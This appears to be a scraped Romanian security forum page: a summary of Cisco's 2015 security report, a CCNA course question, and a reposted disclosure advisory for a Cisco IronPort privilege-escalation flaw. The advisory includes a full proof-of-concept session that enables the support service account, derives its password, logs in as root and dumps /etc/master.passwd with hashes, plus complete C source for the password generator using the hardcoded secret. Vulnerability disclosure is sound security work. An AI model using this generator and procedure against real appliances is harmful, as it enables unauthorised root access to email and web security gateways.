https://www.cisco.com/web/offer/gist_ty2_asset/Cisco_2015_ASR.pdf
  13. Download CISCO SECURITY REPORT 2015 Cisco a prezentat cea mai noua editie a raportului de securitate informatica ce releva, printre altele, ca volumele de spam au crescut in 2014, iar malware-ul ajunge pe calculatoarele din companii prin "momirea" angajatilor sa deschida diverse link-uri periculoase sau sa instaleze aplicatii dubioase. Nu tratam cu seriozitatea necesara amenintarile din zona cibernetica, a spus, la prezentarea studiului, Dorin Pena, director general al Cisco Romania "Noi, ca utilizatori, suntem principalii responsabili pentru siguranta noastra si putem fi folositi ca "platforma" de lansare a altor atacuri impotriva altora sau chiar impotriva noastra", spune el. "Zona cibernetica este noul mediu in care ne ducem viata. Insa din pacate, din punct de vedere al securitatii nu o tratam cu seriozitatea necesara", spune Dorin Pena, directorul general Cisco pentru Romania. El adauga ca in 2015 utilizatorul individual este tinta principala a atacurilor "Este evaluat si este bombardat, pana in momentul in care se gaseste o bresa si el cedeaza. Din pacate e usor sa cedeze, fiindca multi nu sunt instruiti si nu sunt la curent nici macar in legatura cu riscul la care se expun cand comunica pe internet:". Utilizatorii trebuie sa fie mai atenti la ce lucruri deschid pe internet. "Noi, ca utilizatori, suntem principalii responsabili pentru siguranta noastra si putem fi folositi ca "platforma" de lansare a altor atacuri impotriva altora sau chiar impotriva noastra. De ce? Pentru ca ne expunem la o serie de riscuri si, spre exemplu, acceptam mesaje de la surse pe care nu le cunoastem si nu le intelegem. Accesam aplicatii, dam click pe tot felul de bannere pe care nu le intelegem si nu stim ce se afla in spatele lor si acestea pot constitui pericole in zona de cybersecurity", spune Dorin Pena care adauga si ca folosim prea multe versiuni vechi ale aplicatiilor si potentialul pentru atacatori e imens. Mai grav este ca multe companii nu tin pasul cu tehnologia cand e vorba la reactia in fata amenintarilor informatice. Multe companii au un singur om pe IT, dar nu si oameni specializati pe securitatea informatica. O problema in marile companii tinea de faptul ca angajati aduceau stick-uri USB "infectate" de acasa si introduceau, fara sa-si dea seama, malware in reteaua companiei. Stick-urile nu mai sunt o asa problema, insa smartphone-urile da, spune seful Cisco Romania. "Stick-urile sunt din ce in ce mai putin folosite fiindca toti angajati au aceste minuni ale tehnicii numite smartphone-uri. Tin sa precizez ca oamenii constientizeaza pericolele legate legate de stick, insa la fel trebuie sa se intample si cu smartphone-ul. Stick-ul intra intr-un calculator, in timp ce cu un smartphone ce are si acces radio, adica wireless, iar in acest caz pagubele pot fi mult mai mari decat cu un simplu stick. (...) Smartphone-ul are putere de procesare si poate sa comunice si cu exteriorul, stick-ul doar introduce ceva pe calculator." Tendinte cheie prezentate in raport: Tendinte care exploateaza vulnerabilitatile site-urilor web: examinand cu atentie tot ce s-a intamplat din punct de vedere al securitatii in ultimul an, echipa de cercetare a observat urmatoarele: O scadere masiva in ceea ce priveste exploit-urile Java (34%), pe masura ce securitatea a fost imbunatatita O crestere semnificativa a atacurilor Silverlight ? cu peste 200% - desi este inca un volum mic de atacuri Atacurile care exploateaza vulnerabilitatile Flash (scadere 3%) si PDF (scadere 7%) se mentin relativ la acelasi nivel. "Din punct de vedere al securitatii vom vedea foarte multe schimbari in perioada urmatoare. Industria securitatii IT va face tranzitia de la o abordare preventiva la o abordare care va tine cont de toate fazele unui atac ? inaintea, in timpul si dupa ce acesta a avut loc. De asemenea, companiile vor putea folosi Internet of Everything in avantajul lor atunci cand vine vorba despre lupta impotriva criminalitatii informatice. Miliarde de dispozitive conectate vor genera foarte multe informatii care vor putea fi folosite pentru a imbunatati securitatea", spune Dorin Pena, Director General Cisco Romania. Iata concluziile studiului Kit-uri de exploatare: 88% scadere din luna mai pana in luna decembrie. Dar, chiar si cu aceasta scadere, se observa numeroase brese de securitate care au loc intr-un ritm alarmant. Flash si JavaScript ? O noua combinatie: malware-ul Flash poate acum interactiona cu limbajul de programare JavaScript pentru a ascunde activitatile malitioase prin diseminarea vulnerabilitatilor intre doua fisiere diferite: unul flash, altul JavaScript. Aceste tipuri de atacuri devin astfel mult mai greu de detectat si analizat, lucru care arata nivelul de profesionalism si complexitate al atacatorilor. Atacuri malware: Industriile farmaceutica si chimica au inregistrat cel mai mare numar de atacuri malware pe parcursul anului trecut, iar industriile media, producatoare, de transport terestru, naval si aerian, sunt in primele 5 segmente cele mai afectate de aceste tipuri de atacuri. Tintele atacatorilor ating verticale diferite - doar industria de transport aerian, cea farmaceutica si chimica se mai afla in top 5 fata de anul trecut. Spam-ul folosit ca modalitate de phishing: Desi in scadere fata de recordurile atinse acum cativa ani, volumele de spam au crescut cu 250% din ianuarie pana in noiembrie 2014. Spamul de tip Snowshoe, care presupune trimiterea de volume mici de spam de pe mai multe adrese IP pentru a evita detectia, este in crestere. Persoane rau intentioate fura adesea date de identificare valide de email cu ajutorul mesajelor spam si trimit apoi astfel de mesaje folosind adrese reale. Spammerii transforma mesajele pentru a evita detectarea, trimitand spam ascuns in mesaje attractive, astfel incat sa asigure o rata mare de deschidere. Mesajele sunt diferite pentru a evita filtrele spam. Spre exemplu, au fost identificate 95 de variante diferite ale aceluiasi mesaj. Vulnerabilitati: Adobe si Internet Explorer reprezinta principalele puncte de atac, Adobe fiind implicat in 19% dintre atacurile observate, in timp ce Internet Explorer in 31%. Utilizatorii individuali si echipele IT: Odata cu evolutia tehnologiilor de securitate, atacurile directe devin din ce in ce mai dificil de realizat, astfel incat convingerea utilizatorului sa instaleze malware sau exploatarea decalajelor dintre intentiile echipelor de securitate si actiunile lor, devin activitati de compromitere a securitatii tot mai raspandite. Iar acest lucru este agravat de multe companii care inca folosesc software vechi cu vulnerabilitati foarte bine cunoscute. Heartbleed, spre exemplu, a fost descoperit in urma cu aproximativ 12 luni si a avut un impact foarte mare, in masura in care a dezvaluit o modalitate de exploatare a bibliotecii de criptare Open SSL. In acelasi timp, 56% dintre toate versiunile de Open SSL sunt mai vechi de 56 de luni si inca sunt vulnerabile pentru ca nu au fost actualizate in ultimele luni de zile. Browser: Internet Explorer este varianta de browser cel mai putin actualizata de catre utilizatori ? doar aproximativ 10% dintre cererile de actualizare vin din partea utilizatorilor care au ultima versiune de IE, in timp ce cea mai folosita versiune este mai veche cu cel putin 31 de luni fata de ultima lansata. Spre deosebire de Internet Explorer, 64% dintre cererile de actualizare Chrome vin din ultima versiune a acestui browser. Malvertising: Infractorii cibernetici folosesc modelul software-ului premium gratuit - similar ca legitimitate tacticilor de a oferi gratuit soft, ca mai apoi sa fie taxata folosirea functiilor suplimentare. In acest caz, vorbim de o tehnica sofisticata care vizeaza mai multe directii de distributie a malware-ului. Aceasta presupune colectarea de bani de la mai multi utilizatori individuali, in sume mici, infectand permanent browser-ele acestora. "Companiile iti dau o aplicatie pe gratis, tu o instalezi si, fie iti vin diverse chestionare de completat fie, si asta e mai dificil, iti vin tot felul de bannere publicitare. Sub aceste bannere publicitare am observat o crestere a atacurilor informatice (...) Din ce in ce mai multe companii vand practic publicitate online, iar lucrul asta se intampla si pe dispozitive mobile (...) Ganditi-va ca din ce in ce mai multe plati bancare se fac de pe aceleasi dispoztive mobile care utilizeaza aplicatiile de advertising gratuit", explica Dorin Pena, seful Cisco Romania. Schimbarea perceptiei cu privire la securitatea cibernetica: de la utilizatorii individuali, la marile corporatii Expertii Cisco in probleme de securitate sunt de parere ca este momentul pentru companii sa aiba o noua abordare in ceea ce priveste securitatea cibernetica. Strategiile includ controale de securitate mult mai sofisticate pentru o mai buna protectie impotriva intregului spectru al atacurilor: atat inaintea, in timpul, cat si dupa ce acestea au avut loc. Raportul de securitate Cisco , ajuns anul acesta la a opta editie, cuprinde cele mai recente cercetari ale expertilor Cisco in legatura cu industria securitatii informatice, prezinta companiilor cele mai noi si mai importante tendinte din domeniul securitatii cibernetice si ofera informatii despre felul in care infractorii incearca sa treaca de sistemele de protectie. Raportul include principalele concluzii ale celui mai recent studiu Cisco pe teme de securitate (Security Capabilities Benchmark Study), facut pe 1.700 de companii din noua tari. Scopul lui a fost determinarea gradului de pregatire al companiilor in fata acestor tipuri de atacuri. Potrivit concluziilor studiului, 75% dintre managerii care se ocupa de securitatea informatica a companiilor considera instrumentele de securitate pe care le folosesc ca fiind foarte eficiente. Cu toate acestea, mai putin de 50% dintre respondenti folosesc instrumentele standard, cum sunt cele de patching si configurare pentru a preveni bresele de securitate. In plus, problemele de securitate cibernetica sunt amplificate si de motivatiile geopolitice ale atacatorilor si de cerintele impuse de legile locale, cu referinta la suveranitatea datelor, localizarea si criptarea acestora. Sursa1 Sursa2
  14. /* Cisco Ironport Appliances Privilege Escalation Vulnerability Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.5.5-280 Cisco Ironport WSA - AsyncOS 8.0.5-075 Cisco Ironport SMA - AsyncOS 8.3.6-0 Date: 22/05/2014 Credits: Glafkos Charalambous CVE: Not assigned by Cisco Disclosure Timeline: 19-05-2014: Vendor Notification 20-05-2014: Vendor Response/Feedback 27-08-2014: Vendor Fix/Patch 24-01-2015: Public Disclosure Description: Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation. By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations. The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support. Vendor Response: As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account. [SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password. [GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access. [SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528 Technical Details: By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access. This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service. Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance. Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc. PoC: Enable Service Account ---------------------- root@kali:~# ssh -lenablediag 192.168.0.158 Password: Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance Available Commands: help -- View this text. quit -- Log out. service -- Enable or disable access to the service system. network -- Perform emergency configuration of the diagnostic network interface. clearnet -- Resets configuration of the diagnostic network interface. ssh -- Configure emergency SSH daemon on the diagnostic network interface. clearssh -- Stop emergency SSH daemon on the diagnostic network interface. tunnel -- Start up tech support tunnel to IronPort. print -- Print status of the diagnostic network interface. reboot -- Reboot the appliance. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently disabled. ironport.example.com> service Service Access is currently disabled. Enabling this system will allow an IronPort Customer Support representative to remotely access your system to assist you in solving your technical issues. Are you sure you want to do this? [Y/N]> Y Enter a temporary password for customer support to use. This password may not be the same as your admin password. This password will not be able to be used to directly access your system. []> cisco123 Service access has been ENABLED. Please provide your temporary password to your IronPort Customer Support representative. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently ENABLED (0 current service logins) ironport.example.com> Generate Service Account Password --------------------------------- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe Usage: woofwoof.exe -p password -s serial -p <password> | Cisco Service Temp Password -s <serial> | Cisco Serial Number -h | This Help Menu Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4 Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019 F508A4 Service Password: b213c9a4 Login to the appliance as Service account with root privileges -------------------------------------------------------------- root@kali:~# ssh -lservice 192.168.0.158 Password: Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance # uname -a FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64 # cat /etc/master.passwd # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $ root:*:0:0::0:0:Mr &:/root:/sbin/nologin service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin operator:*:2:5::0:0:System &:/:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include "md5.h" #include "getopt.h" #define MAX_BUFFER 128 #define SECRET_PASS "woofwoof" void usage(char *name); void to_lower(char *str); void fuzz_string(char *str); int main(int argc, char *argv[]) { if (argc < 2) { usage(argv[0]); } int opt; int index; char *temp_pass = { 0 }; char *serial_no = { 0 }; char *secret_pass = SECRET_PASS; char service[MAX_BUFFER] = { 0 }; unsigned char digest[16] = { 0 }; while ((opt = getopt(argc, argv, "p:s:h")) != -1) { switch (opt) { case 'p': temp_pass = optarg; break; case 's': serial_no = optarg; break; case 'h': usage(argv[0]); break; default: printf_s("Wrong Argument: %s\n", argv[1]); break; } } for (index = optind; index < argc; index++) { usage(argv[0]); exit(0); } if (temp_pass == NULL || serial_no == NULL) { usage(argv[0]); exit(0); } if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) { to_lower(serial_no); fuzz_string(temp_pass); strcpy_s(service, sizeof(service), temp_pass); strcat_s(service, sizeof(service), serial_no); strcat_s(service, sizeof(service), secret_pass); MD5_CTX context; MD5_Init(&context); MD5_Update(&context, service, strlen(service)); MD5_Final(digest, &context); printf_s("Service Password: "); for (int i = 0; i < sizeof(digest)-12; i++) printf("%02x", digest[i]); } return 0; } void fuzz_string(char *str) { while (*str){ switch (*str) { case '1': *str = 'i'; break; case '0': *str = 'o'; break; case '_': *str = '-'; break; } str++; } } void to_lower(char *str) { while (*str) { if (*str >= 'A' && *str <= 'Z') { *str += 0x20; } str++; } } void usage(char *name) { printf_s("\nUsage: %s -p password -s serial\n", name); printf_s(" -p <password> | Cisco Service Temp Password\n"); printf_s(" -s <serial> | Cisco Serial Number\n"); printf_s(" -h | This Help Menu\n"); printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name); exit(0); } Source
  15. CCNA (Cisco Certified Network Associate) urmez de 2 luni acest curs si as dori o parere de la voi deoarece nu stiu daca e un prim pas bun .
×
×
  • Create New...